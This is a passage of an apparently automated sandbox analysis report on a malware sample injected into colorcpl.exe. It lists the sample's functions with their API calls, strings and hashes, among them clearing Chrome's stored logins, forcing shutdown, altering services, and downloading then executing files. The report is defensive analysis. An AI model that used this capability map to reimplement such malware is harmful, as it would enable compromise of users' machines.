                                                                                                                              • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0467426A
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 04674271
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                                              • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                                              • API String ID: 2127411465-314212984
                                                                                                                              • Opcode ID: 81f2e078532671681f0b8d36134ee99b42b5af107e680139c46d8ffd6a2961e4
                                                                                                                              • Instruction ID: 280814378387faff4a6046e1936a0f94b551994c474d7f15bc0cfe87316ba27f
                                                                                                                              • Opcode Fuzzy Hash: 81f2e078532671681f0b8d36134ee99b42b5af107e680139c46d8ffd6a2961e4
                                                                                                                              • Instruction Fuzzy Hash: 9EB1F572A0430067EB18FB75DC698FF76A89F92658F40091CE907971D1FE24FA48C6DA
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A9190 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _free.LIBCMT ref: 046A9212
                                                                                                                              • _free.LIBCMT ref: 046A9236
                                                                                                                              • _free.LIBCMT ref: 046A93BD
                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,046BF234), ref: 046A93CF
                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,046D2764,000000FF,00000000,0000003F,00000000,?,?), ref: 046A9447
                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,046D27B8,000000FF,?,0000003F,00000000,?), ref: 046A9474
                                                                                                                              • _free.LIBCMT ref: 046A9589
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 314583886-0
                                                                                                                              • Opcode ID: e365384ad6ce7c955b092a8ba979c998a22d4ae217e4c046bd6e219ae4cddf6d
                                                                                                                              • Instruction ID: caca42c1b2787bea5948d2768a63c5c8936dcc3de768470f9b7a65527b7359ce
                                                                                                                              • Opcode Fuzzy Hash: e365384ad6ce7c955b092a8ba979c998a22d4ae217e4c046bd6e219ae4cddf6d
                                                                                                                              • Instruction Fuzzy Hash: C3C14AB1A00604AFDB20AF78C840AAABBF8EF56314F24499ED49097381F734BD55CF54
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466BA12 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0466BA4E
                                                                                                                              • GetLastError.KERNEL32 ref: 0466BA58
                                                                                                                              Strings
                                                                                                                              • [Chrome StoredLogins found, cleared!], xrefs: 0466BA7E
                                                                                                                              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0466BA19
                                                                                                                              • [Chrome StoredLogins not found], xrefs: 0466BA72
                                                                                                                              • UserProfile, xrefs: 0466BA1E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: DeleteErrorFileLast
                                                                                                                              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                                              • API String ID: 2018770650-1062637481
                                                                                                                              • Opcode ID: f9db417b3b29f015369b13c257529082d6d328e6c8887f011236a02af627e9cd
                                                                                                                              • Instruction ID: c07b336aba90a8bc29dcfa5f0eb3db7b2b7db025410c265d83157236d313652c
                                                                                                                              • Opcode Fuzzy Hash: f9db417b3b29f015369b13c257529082d6d328e6c8887f011236a02af627e9cd
                                                                                                                              • Instruction Fuzzy Hash: E4014271EC0106ABDB047B79DC6BCFD7768ED22904B40111DE443D3290FD527955DAD6
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04677952 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 0467795F
                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 04677966
                                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 04677978
                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 04677997
                                                                                                                              • GetLastError.KERNEL32 ref: 0467799D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                              • String ID: SeShutdownPrivilege
                                                                                                                              • API String ID: 3534403312-3733053543
                                                                                                                              • Opcode ID: 9f3a09fe8fd4c38ffcb35780e6fb33315b6b48d50c7e2645103ae7be6c2c2e56
                                                                                                                              • Instruction ID: 041822029a5ab765b48970b224063951b1011bc703bf8cfd40d51c659e2c796d
                                                                                                                              • Opcode Fuzzy Hash: 9f3a09fe8fd4c38ffcb35780e6fb33315b6b48d50c7e2645103ae7be6c2c2e56
                                                                                                                              • Instruction Fuzzy Hash: 47F0DAB1905129ABDB10ABA1ED4DEEF7FBCEF05715F100154BA09A1140E6785E48CAF1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04669253 Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • __EH_prolog.LIBCMT ref: 04669258
                                                                                                                                • Part of subcall function 046648C8: connect.WS2_32(?,?,?), ref: 046648E0
                                                                                                                                • Part of subcall function 04664AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 04664B36
                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 046692F4
                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 04669352
                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 046693AA
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 046693C1
                                                                                                                                • Part of subcall function 04664E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,046D4EF8,?,00000000,046D4EF8,04664CA8,00000000,?,?,?,046D4EF8,0466530B), ref: 04664E38
                                                                                                                                • Part of subcall function 04664E26: SetEvent.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,?,046D4EF8,0466530B), ref: 04664E43
                                                                                                                                • Part of subcall function 04664E26: CloseHandle.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,?,046D4EF8,0466530B), ref: 04664E4C
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 046695B9
                                                                                                                                • Part of subcall function 04664AA1: WaitForSingleObject.KERNEL32(?,00000000,0466547D,?,?,00000004,?,?,00000004,?,046D4EF8,0466530B), ref: 04664B47
                                                                                                                                • Part of subcall function 04664AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,046D4EF8,0466530B,?,?,?,?,?,0466547D), ref: 04664B75
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1824512719-0
                                                                                                                              • Opcode ID: e4dd40e17818d15c8d4dc6371d81b8eec721201278862a47b02792221b2e735a
                                                                                                                              • Instruction ID: d8b29311cddfdf88360c450f9458f7ae54d0ae56227a6742fa8b54d2b58f6e20
                                                                                                                              • Opcode Fuzzy Hash: e4dd40e17818d15c8d4dc6371d81b8eec721201278862a47b02792221b2e735a
                                                                                                                              • Instruction Fuzzy Hash: 4CB16D72900118ABEB14FBA0DD95AEDB7B9AF14318F10415DE807A7190FF30BB49CB99
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0467AC78 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0467A38E,00000000), ref: 0467AC88
                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0467A38E,00000000), ref: 0467AC9C
                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0467A38E,00000000), ref: 0467ACA9
                                                                                                                              • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0467A38E,00000000), ref: 0467ACDE
                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0467A38E,00000000), ref: 0467ACF0
                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0467A38E,00000000), ref: 0467ACF3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 493672254-0
                                                                                                                              • Opcode ID: 20a922526e8fb65cf02e9b4243fc48a8c861bb00910f42680bdfa66c9eccdf94
                                                                                                                              • Instruction ID: dc06c5116110d686f9660769b787a00ecf2d4e4578f5f0608f0eab5d74d3b755
                                                                                                                              • Opcode Fuzzy Hash: 20a922526e8fb65cf02e9b4243fc48a8c861bb00910f42680bdfa66c9eccdf94
                                                                                                                              • Instruction Fuzzy Hash: 9D01F5B11881247BE7105A789C4DEBE3F6CDB83370F10030DFA26962C0FA64AE49E5E5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0467AA4A Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0467A6A0,00000000), ref: 0467AA53
                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0467A6A0,00000000), ref: 0467AA68
                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,0467A6A0,00000000), ref: 0467AA75
                                                                                                                              • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0467A6A0,00000000), ref: 0467AA80
                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,0467A6A0,00000000), ref: 0467AA92
                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,0467A6A0,00000000), ref: 0467AA95
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 276877138-0
                                                                                                                              • Opcode ID: 70b5e61aa63c2821801ae43c88e4f7da3487b88aff520d4fd122d0c99eebdd10
                                                                                                                              • Instruction ID: ab462d05e100fcf8530f1472c1818fc0739f4eff787f2192e01dd36cb8dbde56
                                                                                                                              • Opcode Fuzzy Hash: 70b5e61aa63c2821801ae43c88e4f7da3487b88aff520d4fd122d0c99eebdd10
                                                                                                                              • Instruction Fuzzy Hash: 3BF0B4B11055346FE3119B209C88DFF3AACDB86355B00001DF90682100FB789C89AAF1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046767B4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 04677952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0467795F
                                                                                                                                • Part of subcall function 04677952: OpenProcessToken.ADVAPI32(00000000), ref: 04677966
                                                                                                                                • Part of subcall function 04677952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 04677978
                                                                                                                                • Part of subcall function 04677952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 04677997
                                                                                                                                • Part of subcall function 04677952: GetLastError.KERNEL32 ref: 0467799D
                                                                                                                              • ExitWindowsEx.USER32(00000000,00000001), ref: 04676856
                                                                                                                              • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0467686B
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 04676872
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                                              • String ID: PowrProf.dll$SetSuspendState
                                                                                                                              • API String ID: 1589313981-1420736420
                                                                                                                              • Opcode ID: e88ffd0e410142796d872adc977657616c873e43ad7535a5026805eef46a57ec
                                                                                                                              • Instruction ID: 5ae3157520b5cfe0678fc027a17e45b65f736140eb5f5ac8eb5f84f9f2a083c2
                                                                                                                              • Opcode Fuzzy Hash: e88ffd0e410142796d872adc977657616c873e43ad7535a5026805eef46a57ec
                                                                                                                              • Instruction Fuzzy Hash: 3D215EA17043059BFF14FBB5D8699FE229DDF52658F40081DA10397682FE78FC0987A9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046B243C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,046B275B,?,00000000), ref: 046B24D5
                                                                                                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,046B275B,?,00000000), ref: 046B24FE
                                                                                                                              • GetACP.KERNEL32(?,?,046B275B,?,00000000), ref: 046B2513
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: InfoLocale
                                                                                                                              • String ID: ACP$OCP
                                                                                                                              • API String ID: 2299586839-711371036
                                                                                                                              • Opcode ID: d253482639a1f0b459acfa28551bba4daaec808f30637d57fe7ad08c5e62c25d
                                                                                                                              • Instruction ID: a61740ce20f2ce8ad1f17c6ffe8f8eab2bd8d07b3c0e43e39708e5da47ed5f56
                                                                                                                              • Opcode Fuzzy Hash: d253482639a1f0b459acfa28551bba4daaec808f30637d57fe7ad08c5e62c25d
                                                                                                                              • Instruction Fuzzy Hash: EE218132A10201A6E734CF54D928AEB73E6EB54B65B4685A4E989DB600F732FDC1C3D0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0467B4A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0467B4B9
                                                                                                                              • LoadResource.KERNEL32(00000000,?,?,0466F3DE,00000000), ref: 0467B4CD
                                                                                                                              • LockResource.KERNEL32(00000000,?,?,0466F3DE,00000000), ref: 0467B4D4
                                                                                                                              • SizeofResource.KERNEL32(00000000,?,?,0466F3DE,00000000), ref: 0467B4E3
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                                                              • String ID: SETTINGS
                                                                                                                              • API String ID: 3473537107-594951305
                                                                                                                              • Opcode ID: dda9b77e11cbe1c50c9ecd1d179cc7f86a50be82d8850bee81abb306f4369962
                                                                                                                              • Instruction ID: 7c24617004b2d4579d0f8ac60ec063b5777a9c0a0909fc91efa3887e721138e7
                                                                                                                              • Opcode Fuzzy Hash: dda9b77e11cbe1c50c9ecd1d179cc7f86a50be82d8850bee81abb306f4369962
                                                                                                                              • Instruction Fuzzy Hash: 4CE01AB6601310ABCB251BA5EC4CD463F29F7CAB6230010A5F70296350E6398C45EAA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04669665 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • __EH_prolog.LIBCMT ref: 0466966A
                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 046696E2
                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0466970B
                                                                                                                              • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 04669722
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$File$CloseFirstH_prologNext
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1157919129-0
                                                                                                                              • Opcode ID: 664bbf6c6ca2a59a6a633dda5db81ec12fe92300741739ac91836ba45ceeee15
                                                                                                                              • Instruction ID: 36d7c2a0028725ed67ed2800a00c5439d5a37147cf1ddcc8d2de5a0f8090557b
                                                                                                                              • Opcode Fuzzy Hash: 664bbf6c6ca2a59a6a633dda5db81ec12fe92300741739ac91836ba45ceeee15
                                                                                                                              • Instruction Fuzzy Hash: 3281FD729001199BEB15EBA0DCA49EDB7B8AF15319F14426ED807A7190FF30BB49CB94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046B2610 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 046A8215: GetLastError.KERNEL32(?,0469F720,0469A7F5,0469F720,046D4EF8,?,0469CE15,FF8BC35D,046D4EF8,046D4EF8), ref: 046A8219
                                                                                                                                • Part of subcall function 046A8215: _free.LIBCMT ref: 046A824C
                                                                                                                                • Part of subcall function 046A8215: SetLastError.KERNEL32(00000000,FF8BC35D,046D4EF8,046D4EF8), ref: 046A828D
                                                                                                                                • Part of subcall function 046A8215: _abort.LIBCMT ref: 046A8293
                                                                                                                                • Part of subcall function 046A8215: _free.LIBCMT ref: 046A8274
                                                                                                                                • Part of subcall function 046A8215: SetLastError.KERNEL32(00000000,FF8BC35D,046D4EF8,046D4EF8), ref: 046A8281
                                                                                                                              • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 046B271C
                                                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 046B2777
                                                                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 046B2786
                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,046A4A6C,00000040,?,046A4B8C,00000055,00000000,?,?,00000055,00000000), ref: 046B27CE
                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,046A4AEC,00000040), ref: 046B27ED
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 745075371-0
                                                                                                                              • Opcode ID: 060235a0cc39c23e1fc2f6741d4f2498c1ebd15b1eb97d99a05467b6f9714edf
                                                                                                                              • Instruction ID: fa1888743f7aa1c9a7ed3aba23c6f130a10348f0741c76016ec0967d25444881
                                                                                                                              • Opcode Fuzzy Hash: 060235a0cc39c23e1fc2f6741d4f2498c1ebd15b1eb97d99a05467b6f9714edf
                                                                                                                              • Instruction Fuzzy Hash: 96516271A00215ABEF20DFA4CC58AFA77F8FF19300F0444A9E994E7250F770A9858BE5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466880C Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • __EH_prolog.LIBCMT ref: 04668811
                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,Function_00066608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 046688CA
                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 046688F2
                                                                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 046688FF
                                                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04668A15
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1771804793-0
                                                                                                                              • Opcode ID: 1d13290a45fdb60b813cf7d13fb8031a047cf93b2c82495d30d4e2bc4b073cbd
                                                                                                                              • Instruction ID: 257e0b9cc3a69cb8c7aa503a9fe671cda824c421a341b8ef02c2d963211c46ed
                                                                                                                              • Opcode Fuzzy Hash: 1d13290a45fdb60b813cf7d13fb8031a047cf93b2c82495d30d4e2bc4b073cbd
                                                                                                                              • Instruction Fuzzy Hash: 1A513A72901209AAEF04FB74D9659ED77B8AF11349F50016DA80BA3190FF34BB49CB99
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04666EB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 04666FBC
                                                                                                                              • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 046670A0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: DownloadExecuteFileShell
                                                                                                                              • String ID: C:\Windows\SysWOW64\colorcpl.exe$open
                                                                                                                              • API String ID: 2825088817-1189844230
                                                                                                                              • Opcode ID: 27f7e182f0840463267e7ff91a338309707ac3e9caa0cc0d372b2f8b3f9ab9d9
                                                                                                                              • Instruction ID: f924fd044f249f08c407e7c1454a5e1a440f216c4f2e53ddafcb06600dd899ec
                                                                                                                              • Opcode Fuzzy Hash: 27f7e182f0840463267e7ff91a338309707ac3e9caa0cc0d372b2f8b3f9ab9d9
                                                                                                                              • Instruction Fuzzy Hash: 1C61F171B04304ABEA24FB75C8659BE73A99F9264DF40091DE543572C1FE30FA09C7AA
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0467C9E2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0467CAD7
                                                                                                                                • Part of subcall function 0467376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0467377E
                                                                                                                                • Part of subcall function 0467376F: RegSetValueExA.KERNEL32(?,046C74B8,00000000,?,00000000,00000000,046D52F0,?,?,0466F853,046C74B8,4.9.4 Pro), ref: 046737A6
                                                                                                                                • Part of subcall function 0467376F: RegCloseKey.ADVAPI32(?,?,?,0466F853,046C74B8,4.9.4 Pro), ref: 046737B1
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                              • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                              • API String ID: 4127273184-3576401099
                                                                                                                              • Opcode ID: 297ccedd3a6f61cd38b9aaa359d0fe4903a4653d34b6782e73382f329cd3dfff
                                                                                                                              • Instruction ID: 10c8f816f6a77a5e112c51fb7d99bdba7202298667e269db16b688ae588f0e58
                                                                                                                              • Opcode Fuzzy Hash: 297ccedd3a6f61cd38b9aaa359d0fe4903a4653d34b6782e73382f329cd3dfff
                                                                                                                              • Instruction Fuzzy Hash: E7116062F8020063E918757D8D3BF7E3802D356B11F84015CE90A3A7C5F8837A5156DA
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046B1CD8 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 046A8215: GetLastError.KERNEL32(?,0469F720,0469A7F5,0469F720,046D4EF8,?,0469CE15,FF8BC35D,046D4EF8,046D4EF8), ref: 046A8219
                                                                                                                                • Part of subcall function 046A8215: _free.LIBCMT ref: 046A824C
                                                                                                                                • Part of subcall function 046A8215: SetLastError.KERNEL32(00000000,FF8BC35D,046D4EF8,046D4EF8), ref: 046A828D
                                                                                                                                • Part of subcall function 046A8215: _abort.LIBCMT ref: 046A8293
                                                                                                                              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,046A4A73,?,?,?,?,046A44CA,?,00000004), ref: 046B1DBA
                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 046B1E4A
                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 046B1E58
                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,046A4A73,00000000,046A4B93), ref: 046B1EFB
                                                                                                                              Memory Dump Source
